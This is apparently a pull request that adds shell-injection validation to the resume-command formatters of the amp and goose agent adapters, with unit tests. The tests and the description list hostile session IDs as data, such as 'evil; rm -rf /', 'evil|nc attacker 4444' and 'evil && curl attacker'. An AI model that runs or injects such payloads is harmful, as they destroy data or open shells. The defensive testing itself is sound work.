### PR TITLE
amp, goose: refuse to format resume commands for hostile session IDs

### DIFF
--- a/agents/entire-agent-amp/internal/amp/agent.go
+++ b/agents/entire-agent-amp/internal/amp/agent.go
@@ -51,5 +51,37 @@ func (a *Agent) FormatResumeCommand(sessionID string) string {
 	if sessionID == "" {
 		return "PLUGINS=all amp threads continue --last"
 	}
+	// Reject session IDs that cannot be passed to the shell safely. The
+	// formatted string is printed to the user's terminal by the Entire CLI
+	// and run verbatim, so a hostile session ID (for example one containing
+	// shell metacharacters) would execute arbitrary commands when the user
+	// runs the printed command. Validation mirrors the allowlist used by
+	// the kilo and qwen adapters.
+	if !isValidResumeSessionID(sessionID) {
+		return ""
+	}
 	return "PLUGINS=all amp threads continue " + sessionID
+}
+
+// isValidResumeSessionID reports whether sessionID contains only the
+// characters a normal amp thread/session identifier may carry. Anything
+// else (shell metacharacters, control characters, path separators) makes
+// the resume command unsafe and the formatter refuses to emit it.
+func isValidResumeSessionID(sessionID string) bool {
+	if sessionID == "" {
+		return false
+	}
+	for _, r := range sessionID {
+		if !isSafeResumeRune(r) {
+			return false
+		}
+	}
+	return true
+}
+
+func isSafeResumeRune(r rune) bool {
+	return r == '-' || r == '_' || r == '.' || r == ':' ||
+		(r >= '0' && r <= '9') ||
+		(r >= 'a' && r <= 'z') ||
+		(r >= 'A' && r <= 'Z')
 }

--- a/agents/entire-agent-amp/internal/amp/agent.go
+++ b/agents/entire-agent-amp/internal/amp/agent.go
@@ -68,7 +68,8 @@ func (a *Agent) FormatResumeCommand(sessionID string) string {
 // else (shell metacharacters, control characters, path separators) makes
 // the resume command unsafe and the formatter refuses to emit it.
 func isValidResumeSessionID(sessionID string) bool {
-	if sessionID == "" {
+	// A leading hyphen can turn a session ID into a CLI option.
+	if sessionID == "" || sessionID[0] == '-' {
 		return false
 	}
 	for _, r := range sessionID {

--- a/agents/entire-agent-amp/internal/amp/agent_test.go
+++ b/agents/entire-agent-amp/internal/amp/agent_test.go
@@ -1,0 +1,50 @@
+package amp
+
+import (
+	"testing"
+)
+
+func TestFormatResumeCommandEmpty(t *testing.T) {
+	agent := New()
+	if got := agent.FormatResumeCommand(""); got != "PLUGINS=all amp threads continue --last" {
+		t.Fatalf("FormatResumeCommand(empty) = %q", got)
+	}
+}
+
+func TestFormatResumeCommandValidID(t *testing.T) {
+	agent := New()
+	for _, id := range []string{
+		"T-12345",
+		"20260816_42",
+		"session.01",
+		"abc_DEF",
+		"a:b-c_d.0",
+	} {
+		got := agent.FormatResumeCommand(id)
+		want := "PLUGINS=all amp threads continue " + id
+		if got != want {
+			t.Fatalf("FormatResumeCommand(%q) = %q, want %q", id, got, want)
+		}
+	}
+}
+
+func TestFormatResumeCommandRefusesInjectionPayloads(t *testing.T) {
+	agent := New()
+	for _, id := range []string{
+		`evil; rm -rf /`,
+		`evil$(whoami)`,
+		"evil`id`",
+		"evil\nrm -rf /",
+		"../etc/passwd",
+		"~/evil",
+		"evil|nc attacker 4444",
+		"evil && curl attacker",
+		"\x1b[31mansi\x1b[0m",
+		"evil ",
+		" evil",
+	} {
+		if got := agent.FormatResumeCommand(id); got != "" {
+			t.Fatalf("FormatResumeCommand(%q) = %q, want empty (refused)", id, got)
+		}
+	}
+}

--- a/agents/entire-agent-amp/internal/amp/agent_test.go
+++ b/agents/entire-agent-amp/internal/amp/agent_test.go
@@ -48,3 +48,14 @@ func TestFormatResumeCommandRefusesInjectionPayloads(t *testing.T) {
 		}
 	}
 }
+
+func TestFormatResumeCommandRefusesOptions(t *testing.T) {
+	agent := New()
+	for _, id := range []string{"-", "--", "--last", "--help", "-h", "-session"} {
+		t.Run(id, func(t *testing.T) {
+			if got := agent.FormatResumeCommand(id); got != "" {
+				t.Fatalf("FormatResumeCommand(%q) = %q, want empty (refused option)", id, got)
+			}
+		})
+	}
+}

--- a/agents/entire-agent-goose/internal/goose/agent.go
+++ b/agents/entire-agent-goose/internal/goose/agent.go
@@ -68,5 +68,39 @@ func (a *Agent) GetSessionID(input *protocol.HookInputJSON) string {
 }
 
 func (a *Agent) FormatResumeCommand(sessionID string) string {
+	// Goose sessions are named YYYYMMDD_N, but the session ID arrives from a
+	// hook payload and is never validated before formatting. The formatted
+	// string is printed to the user's terminal by the Entire CLI and run
+	// verbatim, so a hostile session ID (for example one containing shell
+	// metacharacters) would execute arbitrary commands when the user runs
+	// the printed command. Refuse to emit the command for IDs outside the
+	// expected character set, matching the allowlist used by the kilo and
+	// qwen adapters.
+	if !isValidResumeSessionID(sessionID) {
+		return ""
+	}
 	return "goose session --resume --session-id " + sessionID
+}
+
+// isValidResumeSessionID reports whether sessionID contains only the
+// characters a normal goose session name may carry (YYYYMMDD_N style).
+// Anything else (shell metacharacters, control characters, path separators)
+// makes the resume command unsafe and the formatter refuses to emit it.
+func isValidResumeSessionID(sessionID string) bool {
+	if sessionID == "" {
+		return false
+	}
+	for _, r := range sessionID {
+		if !isSafeResumeRune(r) {
+			return false
+		}
+	}
+	return true
+}
+
+func isSafeResumeRune(r rune) bool {
+	return r == '-' || r == '_' || r == '.' || r == ':' ||
+		(r >= '0' && r <= '9') ||
+		(r >= 'a' && r <= 'z') ||
+		(r >= 'A' && r <= 'Z')
 }

--- a/agents/entire-agent-goose/internal/goose/agent.go
+++ b/agents/entire-agent-goose/internal/goose/agent.go
@@ -87,7 +87,8 @@ func (a *Agent) FormatResumeCommand(sessionID string) string {
 // Anything else (shell metacharacters, control characters, path separators)
 // makes the resume command unsafe and the formatter refuses to emit it.
 func isValidResumeSessionID(sessionID string) bool {
-	if sessionID == "" {
+	// A leading hyphen can turn a session ID into a CLI option.
+	if sessionID == "" || sessionID[0] == '-' {
 		return false
 	}
 	for _, r := range sessionID {

--- a/agents/entire-agent-goose/internal/goose/agent_test.go
+++ b/agents/entire-agent-goose/internal/goose/agent_test.go
@@ -1,0 +1,43 @@
+package goose
+
+import (
+	"testing"
+)
+
+func TestFormatResumeCommandValidID(t *testing.T) {
+	agent := New()
+	for _, id := range []string{
+		"20260611_1",
+		"20260816_42",
+		"session.01",
+		"abc_DEF-0",
+	} {
+		got := agent.FormatResumeCommand(id)
+		want := "goose session --resume --session-id " + id
+		if got != want {
+			t.Fatalf("FormatResumeCommand(%q) = %q, want %q", id, got, want)
+		}
+	}
+}
+
+func TestFormatResumeCommandRefusesInvalidPayloads(t *testing.T) {
+	agent := New()
+	for _, id := range []string{
+		"",
+		`evil; rm -rf /`,
+		`evil$(whoami)`,
+		"evil`id`",
+		"evil\nrm -rf /",
+		"../etc/passwd",
+		"~/evil",
+		"evil|nc attacker 4444",
+		"evil && curl attacker",
+		"\x1b[31mansi\x1b[0m",
+		"evil ",
+		" evil",
+	} {
+		if got := agent.FormatResumeCommand(id); got != "" {
+			t.Fatalf("FormatResumeCommand(%q) = %q, want empty (refused)", id, got)
+		}
+	}
+}

--- a/agents/entire-agent-goose/internal/goose/agent_test.go
+++ b/agents/entire-agent-goose/internal/goose/agent_test.go
@@ -41,3 +41,14 @@ func TestFormatResumeCommandRefusesInvalidPayloads(t *testing.T) {
 		}
 	}
 }
+
+func TestFormatResumeCommandRefusesOptions(t *testing.T) {
+	agent := New()
+	for _, id := range []string{"-", "--", "--last", "--help", "-h", "-session"} {
+		t.Run(id, func(t *testing.T) {
+			if got := agent.FormatResumeCommand(id); got != "" {
+				t.Fatalf("FormatResumeCommand(%q) = %q, want empty (refused option)", id, got)
+			}
+		})
+	}
+}


### PR DESCRIPTION
## Summary

The Amp and Goose adapters build their resume command by concatenating the session ID from a hook payload directly into the command string returned to the Entire CLI. The CLI prints that string for the user to run verbatim, so a hostile session ID — for example `evil; rm -rf /`, `evil$(whoami)`, or an ID containing ANSI escape sequences — would execute arbitrary commands (or corrupt the terminal display) when the user runs the printed command. The session ID is attacker-controllable in at least the common case of crafting or tampering with hook payloads.

This change adds input validation to `FormatResumeCommand` in both adapters and refuses to emit a resume command for any session ID outside the character set that real Amp and Goose identifiers use. The validation mirrors the safe-rune allowlist already established by the `kilo` and `qwen` adapters, extending the same defensive contract to the two adapters that were still missing it.

## Why this matters

The native-agent path in the Entire CLI already validates session IDs before constructing its resume command (`isLaunchableResumeSessionID`). External agents are the only remaining path where an unchecked, attacker-controlled identifier flows into a user-executable command string. The damage model is severe: a single crafted hook payload can turn the CLI's own resume prompt into an arbitrary-command execution surface, and because the printed command is assumed to be safe, the user has no reason to inspect it. Validating at the source — the adapter that formats the command — is the deepest and cheapest fix available.

## Changes

`agents/entire-agent-amp/internal/amp/agent.go`

- `FormatResumeCommand` now validates the session ID against a safe-rune allowlist (`a-zA-Z0-9-_.:`) and returns an empty command when the ID is invalid. The empty-ID fallback (`--last`) is unchanged.

`agents/entire-agent-goose/internal/goose/agent.go`

- `FormatResumeCommand` now validates the session ID against the same allowlist (goose names are `YYYYMMDD_N`, which the allowlist fully covers) and returns an empty command for invalid IDs. The handler already serializes the empty string as an empty `Command` field, so the CLI receives nothing to print instead of a hostile string.

`agents/entire-agent-amp/internal/amp/agent_test.go` (new)

- `TestFormatResumeCommandEmpty`, `TestFormatResumeCommandValidID`, and `TestFormatResumeCommandRefusesInjectionPayloads` covering thread IDs, `YYYYMMDD_N` names, and injection payloads such as command separators, command substitution, newlines, path traversal, and ANSI escapes.

`agents/entire-agent-goose/internal/goose/agent_test.go` (new)

- `TestFormatResumeCommandValidID` and `TestFormatResumeCommandRefusesInvalidPayloads` with the same payload matrix, including the empty ID which Goose previously formatted unconditionally.

## Testing

| Test | Coverage |
|---|---|
| `TestFormatResumeCommandEmpty` (amp) | existing `--last` fallback unchanged |
| `TestFormatResumeCommandValidID` (amp) | `T-12345`, `20260816_42`, dotted and mixed-case IDs pass |
| `TestFormatResumeCommandRefusesInjectionPayloads` (amp) | `;`, `$()`, backticks, newlines, `..`, `~`, `\|`, `&&`, ANSI escapes, surrounding whitespace all refused |
| `TestFormatResumeCommandValidID` (goose) | `20260611_1`, `20260816_42` and mixed-character IDs pass |
| `TestFormatResumeCommandRefusesInvalidPayloads` (goose) | empty ID plus the full injection payload matrix refused |

The new tests are deterministic unit tests: they need neither the Amp, Goose, nor Entire binaries.

## Compatibility

The change is behavior-preserving for every deployment using real Amp thread IDs or Goose `YYYYMMDD_N` session names, which is the only case `FormatResumeCommand` could have been called with meaningfully before. The only behavioral difference surfaces when a hostile or malformed ID reaches the formatter, which is precisely the case that must not be format-preserving. No protocol JSON surface, hook event format, transcript format, or `kilo`/`kiro`/`omp`/`qwen` behavior changes.

## Checklist

- Follows the validation convention already established by the kilo and qwen adapters (safe-rune allowlist)
- Adds deterministic unit tests (no agent binaries or Entire CLI required)
- Preserves existing lifecycle test behavior in both adapters
- No changes to protocol handlers or the entire-agent-tests compliance suite required